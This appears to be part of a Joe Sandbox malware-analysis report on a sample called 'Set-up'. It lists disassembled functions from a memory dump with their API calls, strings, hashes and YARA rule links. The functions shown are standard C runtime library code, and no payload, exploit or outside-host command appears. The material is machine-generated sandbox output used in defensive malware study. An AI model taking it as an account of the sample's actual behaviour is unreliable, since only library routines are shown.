_errno.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FDCA
_invalid_parameter_noinfo.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FDD5
__lseeki64_nolock.LIBCMT ref: 6BB8FDE6
_getptd.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FE00
GetConsoleMode.KERNEL32(?,?,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002), ref: 6BB8FE1E
GetConsoleCP.KERNEL32(?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB8FE3E
isleadbyte.MSVCR100(00000000), ref: 6BB8FEAE
__fassign.LIBCMT(?,?,00000002), ref: 6BB8FED8
__fassign.LIBCMT(?,?,00000001), ref: 6BB8FEFC
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6BB8FF2E
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6BB8FF57
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6BB8FFB0
_putwch_nolock.MSVCR100(?), ref: 6BB90013
_putwch_nolock.MSVCR100(0000000D), ref: 6BB90040

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: FileWrite$Console__doserrno__fassign_errno_invalid_parameter_noinfo_putwch_nolock$ByteCharErrorLastModeMultiWide__lseeki64_nolock_getptd_isattyisleadbyte
String ID:
API String ID: 1737003884-0
Opcode ID: 75808482fdfb5076dcc6b03df606a70c72b1e9c715eed87b0587de04fb7409d6
Instruction ID: ff4001fc1df9e5b2dd5f67fbd8efc9d316114e5b5db655d7bbda745e5e03e7d0
Opcode Fuzzy Hash: 75808482fdfb5076dcc6b03df606a70c72b1e9c715eed87b0587de04fb7409d6
Instruction Fuzzy Hash: 3A129F35A066A88FDB219F28DC80BD977B4FF0B314F4405EAE41AD7981D7799A80CF52

Function 6BB75276 Relevance: 46.0, APIs: 23, Strings: 3, Instructions: 455
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DName::DName.LIBCMT ref: 6BB75256
DName::operator+.LIBCMT ref: 6BB7525D
DName::DName.LIBCMT ref: 6BB75319
DName::operator+.LIBCMT ref: 6BB75320
DName::operator=.LIBCMT ref: 6BB7536F
DName::operator=.LIBCMT ref: 6BB78874
DName::DName.LIBCMT ref: 6BB8D7AA

Strings

`string', xrefs: 6BB8D86D
operator, xrefs: 6BB7524E
`anonymous namespace', xrefs: 6BB8D8A4

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::$Name::operator+Name::operator=
String ID: `anonymous namespace'$`string'$operator
API String ID: 3850895366-815891235
Opcode ID: c5c20f23d246cec8f3c59be78fdfa7fee2db366df848086a1f2fefb8ef30e29e
Instruction ID: a22837514dd8c165885a3e0b341f2417e5641d6f26970035975f6a68e674fa98
Opcode Fuzzy Hash: c5c20f23d246cec8f3c59be78fdfa7fee2db366df848086a1f2fefb8ef30e29e
Instruction Fuzzy Hash: CC026171D44189DFDF15DFA4E895ABEBBB4EF06344F1000AFE622AB160DB399A44CB44

Function 6BB73687 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.MSVCR100 ref: 6BB736BF
_errno.MSVCR100 ref: 6BB736C9
_wspawnve.MSVCR100(?,?,?,?), ref: 6BB736DA

Part of subcall function 6BB735D0: wcsrchr.MSVCR100(?,0000005C), ref: 6BB7360D
Part of subcall function 6BB735D0: wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6BB73617
Part of subcall function 6BB735D0: wcsrchr.MSVCR100(00000000,0000002E), ref: 6BB73636
Part of subcall function 6BB735D0: _waccess_s.MSVCR100(?,00000000), ref: 6BB7364A

_errno.MSVCR100 ref: 6BB736EE
_errno.MSVCR100 ref: 6BB736F7
_errno.MSVCR100 ref: 6BB7371A
_errno.MSVCR100 ref: 6BB88499
_invalid_parameter_noinfo.MSVCR100 ref: 6BB884A4
_invalid_parameter_noinfo.MSVCR100 ref: 6BB884B7
_errno.MSVCR100 ref: 6BB884C4
wcschr.MSVCR100(?,0000002F), ref: 6BB884D7
_wdupenv_s.MSVCR100(?,00000000,PATH), ref: 6BB884F0
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB8850A
_calloc_crt.MSVCR100(00000104,00000002), ref: 6BB88520
_wcslen.LIBCMT(00000000), ref: 6BB88549
wcscat_s.MSVCR100(00000000,00000104,6BB93050), ref: 6BB88567
_wcslen.LIBCMT(00000000), ref: 6BB88574
_wcslen.LIBCMT(?,00000000), ref: 6BB8857F
wcscat_s.MSVCR100(00000000,00000104,?), ref: 6BB8859D
_errno.MSVCR100 ref: 6BB885AD
_wspawnve.MSVCR100(?,00000000,?,?), ref: 6BB885BE
_errno.MSVCR100 ref: 6BB885D2
__doserrno.MSVCR100 ref: 6BB885DC
free.MSVCR100(00000000), ref: 6BB8862B

Strings

PATH, xrefs: 6BB884E6

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_wcslenwcsrchr$_invalid_parameter_noinfo_wspawnvewcscat_s$__doserrno__invoke_watson_calloc_crt_waccess_s_wdupenv_sfreewcschr
String ID: PATH
API String ID: 3726462291-1036084923
Opcode ID: a46b813423a7757e377d8caea16daa6f804180a32b6348ea1167c17d0804fc95
Instruction ID: 4cc23ca6b07180cfef1deab58421ed98b8e5807cbf71c537e555d9a9f49b2137
Opcode Fuzzy Hash: a46b813423a7757e377d8caea16daa6f804180a32b6348ea1167c17d0804fc95
Instruction Fuzzy Hash: 6651E175804684AFCB31AF75DC819AE3775EF46764B2001A5E83497190FB3DCD41DB62

Function 6BB70AC7 Relevance: 42.3, APIs: 28, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.MSVCR100 ref: 6BB70B2C
_waccess_s.MSVCR100(?,00000000), ref: 6BB70B36

Part of subcall function 6BB627B6: GetFileAttributesW.KERNEL32(?), ref: 6BB627D7

_errno.MSVCR100 ref: 6BB70B43
_wdupenv_s.MSVCR100(?,00000000,?), ref: 6BB70B66

Part of subcall function 6BB6FD24: _lock.MSVCR100(00000007,6BB6FD98,0000000C,6BB70B6B,?,00000000,?), ref: 6BB6FD32

_wcslen.LIBCMT(?), ref: 6BB70B8B
_errno.MSVCR100(00000000,00000000,00000000), ref: 6BB70BAE
_wcslen.LIBCMT(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB70C08
wcscpy_s.MSVCR100(00000000,00000002,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB70C51
_waccess_s.MSVCR100(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BB70C68
_errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB70C8B
wcscpy_s.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB70CA5
free.MSVCR100(?), ref: 6BB70CE1
_errno.MSVCR100 ref: 6BB910C4
_invalid_parameter_noinfo.MSVCR100 ref: 6BB910CE
_wfullpath.MSVCR100(?,?,?), ref: 6BB910E7
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB9110D
_wcslen.LIBCMT(?,00000000,00000000,00000000,00000000,00000000), ref: 6BB91118
_calloc_crt.MSVCR100(00000002,00000002,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB91124
_errno.MSVCR100(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB9113F
_errno.MSVCR100(?,?,?,00000000,00000000,00000000), ref: 6BB9115A
_wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000), ref: 6BB9116A
_calloc_crt.MSVCR100(00000002,00000002,?,?,?,?,00000000,00000000,00000000), ref: 6BB91176
_errno.MSVCR100 ref: 6BB911AF
_errno.MSVCR100 ref: 6BB911BA
free.MSVCR100(?), ref: 6BB911CC
free.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB911F0
_errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6BB911F6
free.MSVCR100(?), ref: 6BB91209

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_wcslenfree$_calloc_crt_waccess_swcscpy_s$AttributesFile__invoke_watson_invalid_parameter_noinfo_lock_wdupenv_s_wfullpath
String ID:
API String ID: 1320518012-0
Opcode ID: 2d16c8cb30f4bf3282a3a46e8449694e65e11ec3c0a60ea0ed7e3f3375987356
Instruction ID: 2c2194d6abe7543a196652fbeece775504218d1b06cc6af2973fcf23b4f25591
Opcode Fuzzy Hash: 2d16c8cb30f4bf3282a3a46e8449694e65e11ec3c0a60ea0ed7e3f3375987356
Instruction Fuzzy Hash: 9D919E71D402A9AEDB25AF74EC89B9D77B8EF05304F5000F6D408A7250FB398E809F91

Function 6BB6B398 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 110libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B3A0
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6BB6B3BD
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6BB6B3CA
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6BB6B3D7
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6BB6B3E4
TlsAlloc.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B420
TlsSetValue.KERNEL32(00000000,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B43B
__init_pointers.LIBCMT ref: 6BB6B445

Part of subcall function 6BB6B365: _encoded_null.MSVCR100(74DEDFB0,6BB6B44A,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B368
Part of subcall function 6BB6B365: __initp_misc_winsig.LIBCMT ref: 6BB6B388

EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B456
EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B463
EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B470
EncodePointer.KERNEL32(?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B47D
DecodePointer.KERNEL32(?,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B49E
_calloc_crt.MSVCR100(00000001,00000214,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B4B3
DecodePointer.KERNEL32(00000000,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B4CD
_initptd.MSVCR100(00000000,00000000,?,?,6BB6B247,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B4D8

Part of subcall function 6BB6215F: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB62200,00000008,6BB875E9,00000000,00000000), ref: 6BB62170
Part of subcall function 6BB6215F: _lock.MSVCR100(0000000D), ref: 6BB621A4
Part of subcall function 6BB6215F: InterlockedIncrement.KERNEL32(?), ref: 6BB621B1
Part of subcall function 6BB6215F: _lock.MSVCR100(0000000C), ref: 6BB621C5

GetCurrentThreadId.KERNEL32 ref: 6BB6B4DF

Strings

FlsGetValue, xrefs: 6BB6B3BF
FlsAlloc, xrefs: 6BB6B3B7
FlsFree, xrefs: 6BB6B3D9
KERNEL32.DLL, xrefs: 6BB6B39B
FlsSetValue, xrefs: 6BB6B3CC

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule_lock$AllocCurrentIncrementInterlockedThreadValue__init_pointers__initp_misc_winsig_calloc_crt_encoded_null_initptd
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3305441573-3819984048
Opcode ID: ae53f31044db2db9ba81f699bc83bbb23e90beae690e7aef5c06f99856b05a30
Instruction ID: aa2ef2af8f364cb2d1322c414f91f24464f3b5f119c0495e95c99ea989976ee0
Opcode Fuzzy Hash: ae53f31044db2db9ba81f699bc83bbb23e90beae690e7aef5c06f99856b05a30
Instruction Fuzzy Hash: 403182319002E1AEDF21AF76CC06A163BF4EB9A7A5B16061FE42483150EB7AC941CF70

Function 6BBD612B Relevance: 36.3, APIs: 24, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBCMT ref: 6BBD6146

Part of subcall function 6BBD5907: DName::DName.LIBCMT ref: 6BBD591A
Part of subcall function 6BBD5907: DName::operator+.LIBCMT ref: 6BBD5921

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: 4bcaa13674c2f5534a61dee35bdcd89e149182b10a3734126835829d826c293b
Instruction ID: 5e5795d7caaec2bca71bacc54d6cfaab31061ee1c79fee7872847ac7f28ffc28
Opcode Fuzzy Hash: 4bcaa13674c2f5534a61dee35bdcd89e149182b10a3734126835829d826c293b
Instruction Fuzzy Hash: EAD13075900289AFDF05DFA8D881AEEBBF8EF05354F10406AE515E7290EB3CDA45CB51

Function 6BB654B9 Relevance: 34.8, APIs: 23, Instructions: 295COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 6BB512D7
free.MSVCR100(?), ref: 6BB5131B
_malloc_crt.MSVCR100(00000004), ref: 6BB654FE

Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5

_calloc_crt.MSVCR100(00000180,00000002,00000004), ref: 6BB6550E
_calloc_crt.MSVCR100(00000180,00000001,00000180,00000002,00000004), ref: 6BB65519
_calloc_crt.MSVCR100(00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6BB65524
_calloc_crt.MSVCR100(00000101,00000001,00000180,00000001,00000180,00000001,00000180,00000002,00000004), ref: 6BB65533
GetCPInfo.KERNEL32(?,?), ref: 6BB65586
___crtGetStringTypeA.LIBCMT ref: 6BB655CA
__crtLCMapStringA.MSVCR100(00000000,?,00000100,?,000000FF,?,000000FF,?,00000000), ref: 6BB655FD
__crtLCMapStringA.MSVCR100(00000000,?,00000200,?,000000FF,?,000000FF,?,00000000), ref: 6BB6562A
memcpy.MSVCR100(?,?,000000FE), ref: 6BB65684
memcpy.MSVCR100(?,?,0000007F,?,?,000000FE), ref: 6BB65693
memcpy.MSVCR100(?,?,0000007F,?,?,0000007F,?,?,000000FE), ref: 6BB656A5
free.MSVCR100(?), ref: 6BB656FA

Part of subcall function 6BB6014E: HeapFree.KERNEL32(00000000,00000000,?,6BB87602,00000000), ref: 6BB60164

free.MSVCR100(?,?), ref: 6BB90A76
free.MSVCR100(?,?,?), ref: 6BB90A7E
free.MSVCR100(?,?,?,?), ref: 6BB90A86

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: free$_calloc_crt$Stringmemcpy$__crt$DecrementFreeHeapInfoInterlockedType___crt_malloc_crtmalloc
String ID:
API String ID: 3303389740-0
Opcode ID: f25745781956eeccf69593e50eee2aa33bfea91bb05e9ce17e2f4de7d2287501
Instruction ID: 94fa8db88e8c8e9c8cca79343caa8dd75be028f1ea3e0345be54e85ecdf32ac0
Opcode Fuzzy Hash: f25745781956eeccf69593e50eee2aa33bfea91bb05e9ce17e2f4de7d2287501
Instruction Fuzzy Hash: 01B18BB2D00289AFEB10CFA9C891BEEBBF5FF09304F44006DE555A7250E739A951CB65

Function 6BB726C3 Relevance: 34.7, APIs: 23, Instructions: 213COMMON

Download Yara Rule

APIs

wcsnlen.MSVCR100(?,00007FFF), ref: 6BB726ED
wcsnlen.MSVCR100(?,00007FFF,?,00007FFF), ref: 6BB726F8
_calloc_crt.MSVCR100(00000002,00000002), ref: 6BB72717
wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6BB7272E
wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6BB7274B

Part of subcall function 6BB7248A: wcschr.MSVCR100(00000000,0000003D,74DEDF80,00000000,01821910), ref: 6BB724B5
Part of subcall function 6BB7248A: free.MSVCR100(?,74DEDF80,00000000,01821910), ref: 6BB72528

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB72789
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB727A5
_calloc_crt.MSVCR100(00000000,00000001), ref: 6BB727B2
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6BB727CB
_strlen.LIBCMT(?), ref: 6BB727DD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 6BB727FB
_errno.MSVCR100 ref: 6BB72820
_errno.MSVCR100 ref: 6BB90FD6
_invalid_parameter_noinfo.MSVCR100 ref: 6BB90FE1
wcschr.MSVCR100(?,0000003D), ref: 6BB90FF1
wcsnlen.MSVCR100(-00000002,00007FFF), ref: 6BB91015
_wcslen.LIBCMT(?), ref: 6BB91021
_calloc_crt.MSVCR100(00000001,00000002,?), ref: 6BB9102C
wcscpy_s.MSVCR100(00000000,00000001,?), ref: 6BB91042
_errno.MSVCR100 ref: 6BB9104F
_invalid_parameter_noinfo.MSVCR100 ref: 6BB9105A
free.MSVCR100(?), ref: 6BB91075
free.MSVCR100(?), ref: 6BB91097

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$_calloc_crt_errnofreewcscpy_swcsnlen$_invalid_parameter_noinfowcschr$_strlen_wcslen
String ID:
API String ID: 928254730-0
Opcode ID: be26e0fc733374c5904f27346f85945ed9d0c668de09a7d20da8501be59f9abe
Instruction ID: 29153244b1c8a177a6f063a3a1edeb0493ed394698647bbdde52c4c99c0b06e5
Opcode Fuzzy Hash: be26e0fc733374c5904f27346f85945ed9d0c668de09a7d20da8501be59f9abe
Instruction Fuzzy Hash: A851F7319052A4BEDB21ABB59C86D9F3B6CDF47B74B2045B5F02496180FB3ECA4087A0

Function 6BB77B2C Relevance: 33.3, APIs: 18, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

_FindAndUnlinkFrame.MSVCR100(?), ref: 6BB77B42

Part of subcall function 6BB77840: _getptd.MSVCR100 ref: 6BB77846
Part of subcall function 6BB77840: _getptd.MSVCR100 ref: 6BB7785A

_getptd.MSVCR100 ref: 6BB77B58
_getptd.MSVCR100 ref: 6BB77B67
_getptd.MSVCR100 ref: 6BB77B78
_getptd.MSVCR100 ref: 6BB77B8C
_IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6BB77B9A

Part of subcall function 6BB77C17: _getptd.MSVCR100(?,6BB77B9F,?), ref: 6BB77C1C

_getptd.MSVCR100(00000001), ref: 6BB77BA6
__DestructExceptionObject.MSVCR100(?,00000001), ref: 6BB77BB1
_getptd.MSVCR100 ref: 6BB77BB8
_getptd.MSVCR100 ref: 6BB77BC7
_getptd.MSVCR100 ref: 6BB77BD8
_getptd.MSVCR100 ref: 6BB77BF6
_getptd.MSVCR100 ref: 6BB77C04
_getptd.MSVCR100 ref: 6BB8CA49
_getptd.MSVCR100 ref: 6BB8CA61

Strings

csm, xrefs: 6BB77B4C

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
String ID: csm
API String ID: 473968603-1018135373
Opcode ID: 7c00eafc30ea7a7b13f024ac2faff1589b0cf6e0009a91ce2b35c0ac754900c2
Instruction ID: b61a2154bf00b4e6872f8b69da187ff572ed13b8ad22149a08ff3135db04147a
Opcode Fuzzy Hash: 7c00eafc30ea7a7b13f024ac2faff1589b0cf6e0009a91ce2b35c0ac754900c2
Instruction Fuzzy Hash: 13311830505280CFC214AF67C485E5D37A5EF90269F8684F9D4688FA32DFBADD84CBA1

Function 6BB735D0 Relevance: 33.2, APIs: 22, Instructions: 192COMMONLIBRARYCODE

Download Yara Rule

APIs

wcsrchr.MSVCR100(?,0000005C), ref: 6BB7360D
wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6BB73617
wcsrchr.MSVCR100(00000000,0000002E), ref: 6BB73636
_waccess_s.MSVCR100(?,00000000), ref: 6BB7364A
_errno.MSVCR100 ref: 6BB7367D
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8833A
wcschr.MSVCR100(?,0000003A), ref: 6BB8834A
_wcslen.LIBCMT(?), ref: 6BB8835C
_calloc_crt.MSVCR100(00000003,00000002,?), ref: 6BB88367
wcscpy_s.MSVCR100(00000000,00000003,6BB93048), ref: 6BB8837F
wcscat_s.MSVCR100(00000000,00000003,?), ref: 6BB8838E

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: wcsrchr$_calloc_crt_errno_invalid_parameter_noinfo_waccess_s_wcslenwcscat_swcschrwcscpy_s
String ID:
API String ID: 255226058-0
Opcode ID: d923334df452a3b743e8c6f1b58ce0d232cc07eca25a7ed18c8500c5f2be50c0
Instruction ID: ea5d9130708150e2a73962785b4b0b328e00171487b08b90b158a7efbaa74644
Opcode Fuzzy Hash: d923334df452a3b743e8c6f1b58ce0d232cc07eca25a7ed18c8500c5f2be50c0
Instruction Fuzzy Hash: 1451E632D04695EBEB21AF75DC82A9E3778EF01794F400164ED24A7294FB3DCE119B50

Function 6BB72614 Relevance: 31.7, APIs: 21, Instructions: 218COMMONLIBRARYCODE

Download Yara Rule

APIs

_mbschr.MSVCR100(00000000,0000003D,00000000,00000000,74DEDFF0), ref: 6BB7263B

Part of subcall function 6BB725FD: _mbschr_l.MSVCR100(00000000,00000000,00000000,?,6BB72640,00000000,0000003D,00000000,00000000,74DEDFF0), ref: 6BB7260A

free.MSVCR100(?,00000000,00000000,74DEDFF0), ref: 6BB726A2
_errno.MSVCR100(00000000,00000000,74DEDFF0), ref: 6BB726B4
_errno.MSVCR100(74DEDFF0), ref: 6BB91B83
_invalid_parameter_noinfo.MSVCR100(74DEDFF0), ref: 6BB91B8E
___wtomb_environ.LIBCMT ref: 6BB91BB7

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$___wtomb_environ_invalid_parameter_noinfo_mbschr_mbschr_lfree
String ID:
API String ID: 679965329-0
